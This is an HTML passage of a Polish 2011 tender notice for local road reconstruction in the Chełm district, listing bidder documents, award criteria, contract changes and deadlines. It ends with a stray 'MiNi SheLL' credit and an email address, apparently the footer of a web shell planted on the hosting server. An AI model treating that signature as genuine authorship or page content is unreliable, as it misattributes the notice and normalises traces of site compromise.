<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca polega  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,    w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1  oraz w art. 24 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy   w sprawie zamówienia publicznego. Dokumenty należy złożyć w formie oryginału lub kopi poświadczonej za zgodność  z oryginałem przez Wykonawcę bądź upoważnionego przedstawiciela Wykonawcy, zgodnie  z treścią dokumentu określającego status Wykonawcy bądź treścią załączonego do oferty pełnomocnictwa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany istotnych postanowień  zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy polegające na: 
a)zmiana osób (kierownika budowy) uczestniczących w wykonaniu zamówienia- zmiana zostanie dokonana jeżeli Wykonawca zwróci się pisemnie do Zamawiającego z prośbą  o zmianę osób uczestniczących w wykonaniu zamówienia, załącza również wymagane w pkt 6 SIWZ oświadczenia i dokumenty potwierdzające spełnianie warunków udziału   w postępowaniu określonych przez Zamawiającego,
b)zmiana harmonogramu rzeczowego realizacji robót budowlanych w przypadku gdy Wykonawca realizuje roboty z wyprzedzeniem- zmiana zostanie dokonana na pisemny wniosek Wykonawcy, do którego zostanie dołączona propozycja aktualnego harmonogramu  rzeczowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chelmski.iap.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Chełmie
Plac Niepodległości 1
22-100 Chełm, I piętro, pokój Nr 85.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2011 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Chełmie
Plac Niepodległości 1
22-100 Chełm
I piętro, pokój Nr 87.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zadanie realizowane jest w ramach Programu Wieloletniego pod nazwą NARODOWY PROGRAM PRZEBUDOWY DRÓG LOKALNYCH 2008-2011.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com